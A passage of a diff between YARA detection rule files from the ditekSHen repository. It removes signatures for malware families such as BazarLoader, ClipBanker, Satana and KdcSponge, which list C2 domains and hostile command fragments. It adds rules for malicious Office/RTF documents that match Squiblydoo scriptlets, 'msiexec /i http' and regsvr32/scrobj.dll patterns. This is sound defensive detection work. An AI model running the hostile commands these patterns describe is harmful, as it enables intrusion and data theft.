-		$ua1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" fullword wide
-		$ua2 = "Mozilla/5.0 (Android; Mobile; rv:28.0) Gecko/28.0 Firefox/28.0" fullword wide
-		$ua3 = "Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 520)" fullword wide
-		$ua4 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; XBLWP7; ZuneWP7)" fullword wide
-		$ua5 = "Mozilla/5.0 (IE 11.0; Windows NT 6.3; Trident/7.0; .NET4.0E; .NET4.0C; rv:11.0) like Gecko" fullword wide
-		$ua6 = "Mozilla/5.0 (iPad; U; CPU OS 5_1_1 like Mac OS X; en-us) AppleWebKit/534.46.0 (KHTML, like Gecko) CriOS/19.0.1084.60 Mobile/9B206 Safari/7534.48.3" fullword wide
-		$ua7 = "Mozilla/5.0 (Linux; Android 4.1; Galaxy Nexus Build/JRN84D) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19" fullword wide
-		$ua8 = "Mozilla/5.0 (Linux; Android 7.1.1; ASUS_X017DA Build/NGI77B; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/1.5.1(11790) Chrome/74.0.3729.157 Mobile Safari/537.36" fullword wide
-		$ua9 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0" fullword wide
-		$ua10 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" fullword wide
-		$ua11 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36" fullword wide
-		$ua12 = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0" fullword wide
-		$n1 = "charset={[A-Za-z0-9\\-_]+}" fullword wide
-		$n2 = "Content-Length: {[0-9]+}" fullword wide
-		$n3 = "Location: {[0-9]+}" fullword wide
-		$n4 = "Set-Cookie:\\b*{.+?}\\n" fullword wide
-		$n5 = "{<html>}" fullword wide
-		$n6 = "&formid=" fullword ascii
-		$n7 = "/?id=" fullword ascii
-		$p1 = "\\milan\\Debug\\Milan.pdb" ascii
-		$p2 = "\\milan\\Release\\Milan.pdb" ascii
-		$p3 = "\\BackDor Last\\" ascii
-		$p4 = "\\BackDorLast\\" ascii
-		$s1 = "/q \"%s\" & waitfor" wide
-		$s2 = "/q \"%s\" & schtasks /delete" wide
-		$s3 = "*BOT@;" fullword ascii
-		$s4 = "mofcomp \"" fullword ascii
-		$s5 = "\"WQL\";};instance of " ascii
-		$s6 = "</svalue>" fullword wide
-		$s7 = "cmd.exe /C " wide nocase
-		$d1 = "akastatus.com" ascii
-		$d2 = "centosupdatecdn.com" ascii
-		$d3 = "checkinternet.org" ascii
-		$d4 = "cybersecnet.co.za" ascii
-		$d5 = "cybersecnet.org" ascii
-		$d6 = "defenderlive.com" ascii
-		$d7 = "defenderstatus.com" ascii
-		$d8 = "digitalmarketingagency.net" ascii
-		$d9 = "dnsanalizer.com" ascii
-		$d10 = "dnscatalog.net" ascii
-		$d11 = "dnscdn.org" ascii
-		$d12 = "dnsstatus.org" ascii
-		$d13 = "excsrvcdn.com" ascii
-		$d14 = "hpesystem.com" ascii
-		$d15 = "livednscdn.com" ascii
-		$d16 = "micrsoftonline.net" ascii
-		$d17 = "ndianmombais.com" ascii
-		$d18 = "online-analytic.com" ascii
-		$d19 = "securednsservice.net" ascii
-		$d20 = "sysadminnews.info" ascii
-		$d21 = "uctpostgraduate.com" ascii
-		$d22 = "updatecdn.net" ascii
-		$d23 = "web-traffic.info" ascii
-		$d24 = "windowsupdatecdn.com" ascii
-		$d25 = "wsuslink.com" ascii
-		$d26 = "zonestatistic.com" ascii
+		$img_clsid = "12d11255c65ccf118d6700aa00bdce1d" ascii nocase
+		$sub_clsid = "10d11255c65ccf118d6700aa00bdce1d" ascii nocase
+		$http_url = "6800740074007000" ascii nocase
+		$file_url = "660069006c0065003a" ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $p* ) and ( 2 of ( $s* ) or 2 of ( $ua* ) ) ) or ( 5 of ( $n* ) and ( 2 of ( $ua* ) or 1 of ( $p* ) or 1 of ( $s* ) ) ) or ( 3 of ( $s* ) and ( 2 of ( $ua* ) or 5 of ( $n* ) ) ) or ( 2 of ( $d* ) and 6 of them ) )
+		uint32( 0 ) == 0x74725c7b and filesize < 1500KB and ( $img_clsid or $sub_clsid ) and ( $http_url or $file_url )
 }
-rule DITEKSHEN_MALWARE_Win_UNK05 : FILE
+rule DITEKSHEN_INDICATOR_PUB_MSIEXEC_Remote : FILE
 {
 	meta:
-		description = "Detects potential BazarLoader"
+		description = "detects VB-enable Microsoft Publisher files utilizing Microsoft Installer to retrieve remote files and execute them"
 		author = "ditekSHen"
-		id = "12f66315-f381-5910-b1d4-2cbf21c889a4"
+		id = "518db2bb-174b-54c4-b330-1e8a8e36265d"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8469-L8486"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L535-L549"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b3074f237fbaf449a53dcc219f48509db6af4c0d0859e6590563c3412be30aa8"
+		logic_hash = "be5407e6e6e21e77f6de1d3a378996bfc6ce4326986aa03eb152e772bb495184"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "/api/get" ascii wide
-		$s2 = "PARENTCMDLINE" fullword ascii
-		$s3 = "https://microsoft.com/telemetry/update.exe" ascii wide
-		$s4 = "api.opennicproject.org" fullword ascii wide
-		$s5 = "https://%hu.%hu.%hu.%hu:%u" fullword ascii wide
-		$s6 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31" ascii wide
-		$s7 = "PARENTJOBID" fullword ascii wide
-		$s8 = "\\System32\\rundll32.exe" fullword ascii wide
-		$s9 = "{ccc38b40-5b04-4fb1-a684-07c7e448d4df}" fullword ascii wide
-		$s10 = "{065f6686-990b-46fc-829c-a53ec188a723}" fullword ascii wide
+		$s1 = "Microsoft Publisher" ascii
+		$s2 = "msiexec.exe" ascii
+		$s3 = "Document_Open" ascii
+		$s4 = "/norestart" ascii
+		$s5 = "/i http" ascii
+		$s6 = "Wscript.Shell" fullword ascii
+		$s7 = "\\VBE6.DLL#" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0xcfd0 and 6 of them
 }
-rule DITEKSHEN_MALWARE_Win_Clipbanker01 : FILE
+rule DITEKSHEN_INDICATOR_RTF_Ancalog_Exploit_Builder_Document : FILE
 {
 	meta:
-		description = "Detects ClipBanker infostealer"
+		description = "Detects documents generated by Phantom Crypter/Ancalog"
 		author = "ditekSHen"
-		id = "b56514f4-8362-5698-8142-be836b70a11a"
+		id = "01e7f949-8ced-5355-978c-34d6e639e61a"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8488-L8521"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L551-L563"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8ef90e22299a1009468761a4cdb8e2a92920d721f1a7ebceeb81a07e14f9156f"
+		logic_hash = "e458be78ca8975d067110dc38119437b3ffe55afdbfdab47468c9ed74bba9f9d"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
+		snort2_sid = "910000-910001"
+		snort3_sid = "910000"
+		clamav_sig = "INDICATOR.RTF.AncalogExploitBuilderDocument"
 
 	strings:
-		$s1 = "Clipper" fullword wide
-		$s2 = "Ushell" fullword wide
-		$s3 = "Banker" fullword wide
-		$s4 = "ClipPurse" fullword wide nocase
-		$s5 = "SelfClip" fullword wide
-		$s6 = "Cliper" fullword wide
-		$s7 = "FHQD4313-33DE-489D-9721-6AFF69841DEA" fullword wide
-		$s8 = "Remove.bat" fullword wide
-		$s9 = "\\w{1}\\d{12}" fullword wide
-		$s10 = "SELECT * FROM Win32_ComputerSystem" fullword wide
-		$s11 = "red hat" fullword wide
-		$s12 = { 73 00 63 00 68 00 74 00 61 00 73 00 6b 00 73 00
-                 2e 00 65 00 78 00 65 00 00 ?? 2f 00 63 00 72 00
-                 65 00 61 00 74 00 65 00 20 00 2f 00 73 00 63 00
-                 20 00 00 ?? 20 00 2f 00 6d 00 6f 00 20 00 00 ??
-                 20 00 2f 00 72 00 6c 00 20 00 00 ?? 20 00 2f 00
-                 74 00 6e 00 20 00 00 ?? 20 00 2f 00 74 00 72 00
-                 20 00 00 ?? 20 00 ?? 00 ?? 00 00 ?? 2f 00 64 00
-                 65 00 6c 00 65 00 74 00 65 00 20 00 2f 00 74 00
-                 6e }
-		$s13 = "ClipChanger" fullword ascii
-		$s14 = "CheckVirtual" fullword ascii
-		$s15 = "InjReg" fullword ascii
-		$s16 = "SuicideFile" fullword ascii
-		$s17 = "HideFile" fullword ascii
-		$s18 = "AntiVm" fullword ascii
+		$builder1 = "{\\*\\ancalog" ascii
+		$builder2 = "\\ancalog" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 7 of them
+		uint32( 0 ) == 0x74725c7b and 1 of ( $builder* )
 }
-rule DITEKSHEN_MALWARE_Win_Zombieboy : FILE
+rule DITEKSHEN_INDICATOR_RTF_Threadkit_Exploit_Builder_Document : FILE
 {
 	meta:
-		description = "Detects ZombieBoy Downloader"
+		description = "Detects vaiations of RTF documents generated by ThreadKit builder."
 		author = "ditekSHen"
-		id = "c1345196-1686-534c-ab4c-557113c83411"
+		id = "f4a4e7f0-ea2f-523f-9634-a939dc90706e"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8523-L8532"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L565-L582"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0840367c1b56c4c266f22400df95411ba7784b98919a922380e1ec789783bb65"
+		logic_hash = "f2308ac6ae5345e0c783871dd6b471397ec83ba7194db5cc74c8984d84c2c0c2"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = ":\\Users\\ZombieBoy\\" ascii wide
-		$s2 = "RookIE/1.0" fullword ascii wide
+		$obj1 = "\\objhtml" ascii
+		$obj2 = "\\objdata" ascii
+		$obj3 = "\\objupdate" ascii
+		$obj4 = "\\objemb" ascii
+		$obj5 = "\\objautlink" ascii
+		$obj6 = "\\objlink" ascii
+		$obj7 = "\\mmath" ascii
+		$pat1 = /\\objupdate\\v[\\\s\n\r]/ ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint32( 0 ) == 0x74725c7b and 2 of ( $obj* ) and 1 of ( $pat* )
 }
-rule DITEKSHEN_MALWARE_Win_Pcrat : FILE
+rule DITEKSHEN_INDICATOR_XML_Legacydrawing_Autoload_Document : FILE
 {
 	meta:
-		description = "Detects PCRat / Gh0st"
+		description = "detects AutoLoad documents using LegacyDrawing"
 		author = "ditekSHen"
-		id = "de5b3e08-16da-56e2-a0a4-d8bed5840804"
+		id = "ce116601-7048-5a3f-9b73-5127ca3b359e"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8534-L8561"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L584-L594"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ad56d7d6a2bb6d09bc4530c31b51456b6bbca5def1810449fd2a31973cce18f8"
+		logic_hash = "a038636f5e8e7837c2209072f1659b921c8a9a48d4ed153e735915cf1f7f3fcc"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "ClearEventLogA" fullword ascii
-		$s2 = "NetUserAdd" fullword ascii
-		$s3 = "<H1>403 Forbidden</H1>" fullword ascii
-		$s4 = ":]%d-%d-%d  %d:%d:%d" fullword ascii
-		$s5 = "Mozilla/4.0 (compatible)" fullword ascii
-		$s6 = "<Enter>" fullword ascii
-		$s7 = "\\cmd.exe" fullword ascii
-		$s8 = "Program Files\\Internet Explorer\\IEXPLORE.EXE" fullword ascii
-		$s9 = "Collegesoft ScenicPlayer" fullword wide
-		$a1 = "360tray.exe" fullword ascii
-		$a2 = "avp.exe" fullword ascii
-		$a3 = "RavMonD.exe" fullword ascii
-		$a4 = "360sd.exe" fullword ascii
-		$a5 = "Mcshield.exe" fullword ascii
-		$a6 = "egui.exe" fullword ascii
-		$a7 = "kxetray.exe" fullword ascii
-		$a8 = "knsdtray.exe" fullword ascii
-		$a9 = "TMBMSRV.exe" fullword ascii
-		$a10 = "avcenter.exe" fullword ascii
-		$a11 = "ashDisp.exe" fullword ascii
+		$s1 = "<legacyDrawing r:id=\"" ascii
+		$s2 = "<oleObject progId=\"" ascii
+		$s3 = "autoLoad=\"true\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of ( $s* ) and 6 of ( $a* )
+		uint32( 0 ) == 0x6d783f3c and all of ( $s* )
 }
-rule DITEKSHEN_MALWARE_Win_Rapid : FILE
+rule DITEKSHEN_INDICATOR_XML_OLE_Autoload_Document : FILE
 {
 	meta:
-		description = "Detects Rapid ransomware"
+		description = "detects AutoLoad documents using OLE Object"
 		author = "ditekSHen"
-		id = "3a23f344-8345-5ae8-aacb-f2f422d3fc9d"
+		id = "b3d682c3-641a-554a-8607-e99d07e9a57d"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8563-L8585"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L596-L606"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c3f1bffeb402951da8bcccc899b2cdeb3c218b342d8338c750b9ff275537b4b5"
+		logic_hash = "b262a9f8e82dea55afc26acac731827b64f52069a2bf314f716832b3dfc2c04f"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "encblklen" fullword ascii
-		$s2 = ".rapid" fullword ascii
-		$s3 = "BgIAAACkAABSU0E" ascii
-		$s4 = "IFdlIHNlbmQ" ascii
-		$s5 = "Software\\EncryptKeys" fullword ascii
-		$s6 = "local_enc_private_key" fullword ascii
-		$s7 = "local_public_key" fullword ascii
-		$s8 = "How Recovery Files.txt" ascii
-		$s9 = "recovery.txt" ascii
-		$s10 = "thr %i run %s" fullword ascii
-		$s11 = " /TN Encrypter" ascii
-		$s12 = /Encrypter_\d+/ fullword ascii
-		$s13 = "BleepingComputer_rapid" ascii wide
-		$m1 = "tell us your unique ID - ID-" ascii
-		$m2 = "really want to restore your files?" ascii
+		$s1 = "autoLoad=\"true\"" ascii
+		$s2 = "/relationships/oleObject\"" ascii
+		$s3 = "Target=\"../embeddings/oleObject" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or ( 1 of ( $m* ) and 4 of ( $s* ) ) )
+		uint32( 0 ) == 0x6d783f3c and all of ( $s* )
 }
-rule DITEKSHEN_MALWARE_Win_Satana : FILE
+rule DITEKSHEN_INDICATOR_XML_Squiblydoo_1 : FILE
 {
 	meta:
-		description = "Detects Satana ransomware"
+		description = "detects Squiblydoo variants extracted from exploit RTF documents."
 		author = "ditekSHen"
-		id = "f3cb7cc4-3c63-50b2-8e19-d675abbb33f8"
+		id = "cac326ab-cc31-59c1-bd12-285db1675695"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8587-L8604"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L608-L622"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b2946e8c37be4a57237999aaa0c0a760a181306320162e04bc6fc12a542b81d5"
+		logic_hash = "b52ebd76dd4e60f6bd5cb19fed3a72b6aeb90dea95f0d1be61dcfff39ea674ae"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		snort_sid = "920269-920270"
 
 	strings:
-		$bf1 = "Try Decrypt: uc_size = %d, c_size = %d" ascii
-		$bf2 = "dwMailSelector = %d  dwBtcSelector = %d" ascii
-		$bf3 = "%s: Error DecB: 0x%X" ascii
-		$bf4 = "MBR written to Disk# %d" ascii
-		$bf5 = "!SATANA!" ascii wide nocase
-		$bf6 = "1 -th start" fullword ascii
-		$bf7 = "id=%d&code=%d&sdata=%d.%d.%d %d %d %s %s %d&name=%s&md5=%s&dlen=%s" ascii
-		$bf8 = "threadAdminFlood: %s %s %s" wide
-		$bf9 = "%s: NET RES FOUND: %s" wide
+		$slt = "<scriptlet" ascii
+		$ws1 = "CreateObject(\"WScript\" & \".Shell\")" ascii
+		$ws2 = "CreateObject(\"WScript.Shell\")" ascii
+		$ws3 = "ActivexObject(\"WScript.Shell\")" ascii
+		$r1 = "[\"run\"]" nocase ascii
+		$r2 = ".run \"cmd" nocase ascii
+		$r3 = ".run chr(" nocase ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 4 of ( $bf* ) ) or ( 5 of ( $bf* ) )
+		( uint32( 0 ) == 0x4d583f3c or uint32( 0 ) == 0x6d783f3c ) and $slt and 1 of ( $ws* ) and 1 of ( $r* )
 }
-rule DITEKSHEN_MALWARE_Win_Virlock : FILE
+rule DITEKSHEN_INDICATOR_OLE_Suspicious_Reverse : FILE
 {
 	meta:
-		description = "Detects VirLock ransomware"
+		description = "detects OLE documents containing VB scripts with reversed suspicious strings"
 		author = "ditekSHen"
-		id = "dbf46963-3e74-54a0-8f7d-b24436c3ea2c"
+		id = "a7f4d18d-add6-5df2-9a8c-f88d8e3766da"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8606-L8624"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L624-L644"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8d516a0d771d7134c0f917f010b3973ed53b4ee7e4a2cf0bb5daecf9867b0081"
-		score = 75
-		quality = 50
+		logic_hash = "04950549eede23b7006103539f20437713a54138c073d9805048392ea0a3df2a"
+		score = 65
+		quality = 71
 		tags = "FILE"
 
 	strings:
-		$x1 = "BThere are two ways to pay a fine:" fullword wide
-		$x2 = "^Es gibt zwei M" fullword wide
-		$x3 = "glichkeiten, eine Strafe zahlen." fullword wide
-		$x4 = /usertile\d+\.bmp/ fullword wide
-		$s1 = "WinSock 2.0" fullword ascii
-		$s2 = "Running" fullword ascii
-		$s3 = "echo WScript.Sleep(50)>%TEMP%/file.vbs" fullword ascii
-		$s4 = "cscript %TEMP%/file.vbs" fullword ascii
-		$s5 = "del /F /Q file.js" fullword ascii
-		$s6 = "del /F /Q %1" fullword ascii
-		$s7 = "del /F /Q %0" fullword ascii
+		$vb = "\\VBE7.DLL" ascii
+		$cmd1 = "CMD C:\\" nocase ascii
+		$cmd2 = "CMD /c " nocase ascii
+		$kw1 = "]rAHC[" nocase ascii
+		$kw2 = "ekOVNI" nocase ascii
+		$kw3 = "EcaLPEr" nocase ascii
+		$kw4 = "TcEJBO-WEn" nocase ascii
+		$kw5 = "eLbAirav-Teg" nocase ascii
+		$kw6 = "ReveRSE(" nocase ascii
+		$kw7 = "-JOIn" nocase ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and ( ( 2 of ( $x* ) and 2 of ( $s* ) ) or ( 5 of ( $s* ) and 1 of ( $x* ) ) ) ) or ( 8 of them )
+		uint16( 0 ) == 0xcfd0 and $vb and ( ( 1 of ( $cmd* ) and 1 of ( $kw* ) ) or ( 2 of ( $kw* ) ) )
 }
-rule DITEKSHEN_MALWARE_Win_Piratestealer : FILE
+rule DITEKSHEN_INDICATOR_OLE_Suspicious_Activex : FILE
 {
 	meta:
-		description = "Detects PirateStealer"
+		description = "detects OLE documents with suspicious ActiveX content"
 		author = "ditekSHen"
-		id = "07278b99-b990-5016-8389-fbd27538a722"
+		id = "e4a74955-8519-561d-bb23-6469e7ae5aaa"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8626-L8644"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L646-L676"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c29fbc6cfa9e529218fa7315481e0922dc10b2da729931b8580bdd76ecdf6b68"
-		score = 50
-		quality = 75
+		logic_hash = "d9a672b0eeccd93b4ae98fef45560490171f8fc16b712d1e0141fc0ef1d0e342"
+		score = 65
+		quality = 73
 		tags = "FILE"
 
 	strings:
-		$s1 = "PirateStealerBTW" wide
-		$s2 = "/PirateStealer/main/src/" wide
-		$s3 = "%WEBHOOK_LINK%" fullword wide
-		$s4 = "your_webhook_here" fullword wide
-		$s5 = "PirateMonsterInjector" ascii wide
-		$s6 = "DiscordProcesses" fullword ascii
-		$s7 = "GetDiscords" fullword ascii
-		$s8 = { 44 6f 77 6e 6c 6f 61 64 53 74 72 69 6e 67 00 47
-               65 74 46 6f 6c 64 65 72 50 61 74 68 00 57 65 62
-               68 6f 6f 6b 00 4b 69 6c 6c 00 50 72 6f 67 72 61
-               6d 00 53 79 73 74 65 6d 00 4d 61 69 6e 00 }
+		$vb = "\\VBE7.DLL" ascii
+		$ax1 = "_Layout" ascii
+		$ax2 = "MultiPage1_" ascii
+		$ax3 = "_MouseMove" ascii
+		$ax4 = "_MouseHover" ascii
+		$ax5 = "_MouseLeave" ascii
+		$ax6 = "_MouseEnter" ascii
+		$ax7 = "ImageCombo21_Change" ascii
+		$ax8 = "InkEdit1_GotFocus" ascii
+		$ax9 = "InkPicture1_" ascii
+		$ax10 = "SystemMonitor1_" ascii
+		$ax11 = "WebBrowser1_" ascii
+		$ax12 = "_Click" ascii
+		$kw1 = "CreateObject" ascii
+		$kw2 = "CreateTextFile" ascii
+		$kw3 = ".SpawnInstance_" ascii
+		$kw4 = "WScript.Shell" ascii
+		$kw5 = { 43 68 72 [0-2] 41 73 63 [0-2] 4d 69 64 }
+		$kw6 = { 43 68 [0-2] 72 24 28 40 24 28 22 26 48 }
+		$kw7 = { 41 63 74 69 76 65 44 6f 63 75 6d 65 6e 74 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		uint16( 0 ) == 0xcfd0 and $vb and 1 of ( $ax* ) and 2 of ( $kw* )
 }
-rule DITEKSHEN_MALWARE_Win_Nglite : FILE
+rule DITEKSHEN_INDICATOR_OLE_Suspicious_MITRE_T1117 : T1117 FILE
 {
 	meta:
-		description = "Detects NGLite"
+		description = "Detects MITRE technique T1117 in OLE documents"
 		author = "ditekSHen"
-		id = "b014ed4f-57b1-597e-befc-6e7f80855201"
+		id = "0f41b011-2b63-581f-aa10-9560f27d0a27"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8646-L8668"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L678-L689"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d83663908949f69018461c73cf7137cf4ab16cc057cfe47942e6de0415ab5447"
-		score = 75
-		quality = 75
-		tags = "FILE"
+		logic_hash = "f0d97f4de8bde18299ee0caee680a15070a1faa99fc318d144a7b7918c8cbb1f"
+		score = 50
+		quality = 45
+		tags = "T1117, FILE"
 
 	strings:
-		$x1 = "/lprey/main.go" ascii
-		$x2 = "/NGLiteV1.01/lprey/" ascii
-		$x3 = "/ng.com/lprey/" ascii
-		$x4 = "/mnt/hgfs/CrossC2-2.2/src/" ascii
-		$x5 = "WHATswrongwithUu" ascii
-		$s1 = "main.Preylistener" fullword ascii
-		$s2 = "main.Runcommand" fullword ascii
-		$s3 = "main.RandomPass" fullword ascii
-		$s4 = "main.AesEncode" fullword ascii
-		$s5 = "main.RsaEncode" fullword ascii
-		$s6 = "main.AesDecode" fullword ascii
-		$s7 = "main.initonce" fullword ascii
-		$s8 = "main.SendOnce" fullword ascii
-		$s9 = "main.clientConf" fullword ascii
-		$s10 = "main.Sender" fullword ascii
+		$s1 = "scrobj.dll" ascii nocase
+		$s2 = "regsvr32" ascii nocase
+		$s3 = "JyZWdzdnIzMi5leGU" ascii
+		$s4 = "HNjcm9iai5kbGw" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f or uint16( 0 ) == 0xfacf ) and ( ( 1 of ( $x* ) and 2 of ( $s* ) ) or ( 6 of ( $s* ) ) )
+		uint16( 0 ) == 0xcfd0 and 2 of them
 }
-
-rule DITEKSHEN_MALWARE_Win_Kdcsponge : FILE
+rule DITEKSHEN_INDICATOR_OLE_Remotetemplate
 {
 	meta:
-		description = "Detects KdcSponge"
+		description = "Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents"
 		author = "ditekSHen"
-		id = "8832a141-a85d-5604-992e-7e9bd892d410"
+		id = "fbf40436-fc0a-5e55-89ac-5e1dd93e1833"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8670-L8700"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L691-L702"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c891db94df9cde9eaa6096ad68d96c7b85a9c03e255ce43ccb8543a016bd3853"
+		logic_hash = "80cc5b1a8a8899f632401956055374d265c734449e56ffeee5f0ba4911050f36"
 		score = 75
-		quality = 40
-		tags = "FILE"
-		hash1 = "e391c2d3e8e4860e061f69b894cf2b1ba578a3e91de610410e7e9fa87c07304c"
+		quality = 75
+		tags = ""
 
 	strings:
-		$x1 = "\\share\\kdcdll\\user641.pdb" ascii
-		$x2 = "5ADSelf@tech*7890" fullword wide
-		$kdc1 = "KdcVerifyEncryptedTimeStamp" ascii wide nocase
-		$kdc2 = "KerbHashPasswordEx3" ascii wide nocase
-		$kdc3 = "KerbFreeKey" ascii wide nocase
-		$r1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" ascii
-		$r2 = "KDC Service" fullword ascii
-		$s1 = "download//symbols//%S//%S//%S" fullword wide
-		$s2 = "c:\\windows\\system32\\kdcsvc.dll" fullword wide nocase
-		$s3 = /WinHttp(Send|Receive)(Request|Response) failed (0x%.8X)/ fullword wide
+		$olerel = "relationships/oleObject" ascii
+		$target1 = "Target=\"http" ascii
+		$target2 = "Target=\"file" ascii
+		$mode = "TargetMode=\"External" ascii
 
 	condition:
